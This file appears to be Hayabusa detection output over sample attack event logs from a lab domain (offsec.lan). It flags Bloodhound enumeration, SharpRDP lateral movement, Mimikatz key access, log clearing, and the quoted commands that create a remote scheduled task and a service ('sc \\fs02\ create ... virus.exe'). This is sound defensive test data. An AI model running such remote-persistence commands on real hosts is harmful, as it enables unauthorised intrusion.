2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx
2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx
2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,,New Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
